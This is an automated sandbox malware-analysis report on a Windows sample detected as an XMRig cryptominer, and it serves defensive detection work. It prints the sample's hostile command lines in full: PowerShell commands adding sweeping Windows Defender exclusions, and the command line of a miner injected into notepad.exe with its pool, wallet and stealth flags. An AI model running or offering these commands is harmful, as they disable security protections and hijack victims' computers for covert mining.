
Windows Analysis Report
9d2h99wrj.exe

Overview

General Information

Sample name: 9d2h99wrj.exe
Analysis ID: 1589435
MD5: 88848246ce109235a762fcd193210caa
SHA1: 9bbe1f1ef018b4cf4f9b4df15bd0904ab4f2ff5e
SHA256: ae9bec259aef6380ed576361d588180e1850742708c24e60dc92fe07d0fb90c9
Tags: exe, user-JaffaCakes118

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Notepad Making Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • 9d2h99wrj.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\9d2h99wrj.exe" MD5: 88848246CE109235A762FCD193210CAA)
    • conhost.exe (PID: 6896 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7124 cmdline: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6268 cmdline: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6644 cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • notepad.exe (PID: 7112 cmdline: C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth MD5: 27F71B12CB585541885A31BE22F61C83)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2939901627.0000000140751000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown | strings:
  • 0x45a1f0:$a1: mining.set_target
  • 0x454f38:$a2: XMRIG_HOSTNAME
  • 0x457018:$a3: Usage: xmrig [OPTIONS]
  • 0x454f10:$a4: XMRIG_VERSION
00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown | strings:
  • 0x45a1f0:$a1: mining.set_target
  • 0x454f38:$a2: XMRIG_HOSTNAME
  • 0x457018:$a3: Usage: xmrig [OPTIONS]
  • 0x454f10:$a4: XMRIG_VERSION

Source | Rule | Description | Author | Strings
5.2.notepad.exe.140000000.0.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
5.2.notepad.exe.140000000.0.raw.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown | strings:
  • 0x45b7b0:$a1: mining.set_target
  • 0x4564f8:$a2: XMRIG_HOSTNAME
  • 0x4585d8:$a3: Usage: xmrig [OPTIONS]
  • 0x4564d0:$a4: XMRIG_VERSION
5.2.notepad.exe.140000000.0.raw.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth | strings:
  • 0x462df1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
5.2.notepad.exe.140000000.0.raw.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen | strings:
  • 0x4633b0:$s1: %s/%s (Windows NT %lu.%lu
  • 0x4641f8:$s2: \Microsoft\Libs\WR64.sys
  • 0x464490:$s3: \\.\WinRing0_
  • 0x45a7d8:$s4: pool_wallet
  • 0x3fab98:$s5: cryptonight
  • 0x3faba8:$s5: cryptonight
  • 0x3fabb8:$s5: cryptonight
  • 0x3fabc8:$s5: cryptonight
  • 0x3fabe0:$s5: cryptonight
  • 0x3fabf0:$s5: cryptonight
  • 0x3fac00:$s5: cryptonight
  • 0x3fac18:$s5: cryptonight
  • 0x3fac28:$s5: cryptonight
  • 0x3fac40:$s5: cryptonight
  • 0x3fac58:$s5: cryptonight
  • 0x3fac68:$s5: cryptonight
  • 0x3fac78:$s5: cryptonight
  • 0x3fac88:$s5: cryptonight
  • 0x3faca0:$s5: cryptonight
  • 0x3facb8:$s5: cryptonight
  • 0x3facc8:$s5: cryptonight
5.2.notepad.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |

Bitcoin Miner

Source: Process started, Author: Joe Security, Data: Command: C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth, CommandLine: C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth, CommandLine|base64offset|contains: "+~~), Image: C:\Windows\System32\notepad.exe, NewProcessName: C:\Windows\System32\notepad.exe, OriginalFileName: C:\Windows\System32\notepad.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6896, ParentProcessName: conhost.exe, ProcessCommandLine: C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth, ProcessId: 7112, ProcessName: notepad.exe

System Summary

Source: Network Connection, Author: EagleEye Team, Data: DestinationIp: 80.240.16.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 7112, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, CommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6896, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, ProcessId: 7124, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, CommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe", ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 6896, ParentProcessName: conhost.exe, ProcessCommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, ProcessId: 7124, ProcessName: cmd.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7124, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force", ProcessId: 6268, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-12T14:19:08.414148+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 57699 | 1.1.1.1 | 53 | UDP
2025-01-12T14:20:10.875041+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 51665 | 1.1.1.1 | 53 | UDP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-12T14:19:06.623850+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 49730 | 80.240.16.67 | 443 | TCP

AV Detection

Source: 9d2h99wrj.exe, Avira: detected
Source: 9d2h99wrj.exe, Virustotal: Detection: 59%
Source: 9d2h99wrj.exe, ReversingLabs: Detection: 60%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: 9d2h99wrj.exe, Joe Sandbox ML: detected

Bitcoin Miner

Source: Yara match, File source: 5.2.notepad.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.notepad.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000005.00000002.2939901627.0000000140751000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1723490319.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1724814684.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1725250855.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1716722476.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1728133802.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1719250078.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1725707198.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1720494097.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1721642429.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1718529689.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1717762873.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1718162267.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1735767118.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1729940880.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000001.00000003.1720010405.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: conhost.exe PID: 6896, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: notepad.exe PID: 7112, type: MEMORYSTR
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb, source: WR64.sys.1.dr

Networking

Source: C:\Windows\System32\notepad.exe, Network Connect: 192.248.189.11 443
Source: C:\Windows\System32\notepad.exe, Network Connect: 80.240.16.67 443
Source: Joe Sandbox View, ASN Name: AS-CHOOPAUS
Source: Network traffic, Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:57699 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:51665 -> 1.1.1.1:53
Source: Network traffic, Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49730 -> 80.240.16.67:443
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: pool.hashvault.pro
Source: WR64.sys.1.dr, String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: WR64.sys.1.dr, String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: WR64.sys.1.dr, String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: WR64.sys.1.dr, String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmp, String found in binary or memory: https://xmrig.com/wizard%s
Source: unknown, Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown, Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown, Network traffic detected: HTTP traffic on port 49977 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown, Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50023
Source: unknown, Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown, Network traffic detected: HTTP traffic on port 50025 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown, Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown, Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown, Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49744 -> 443
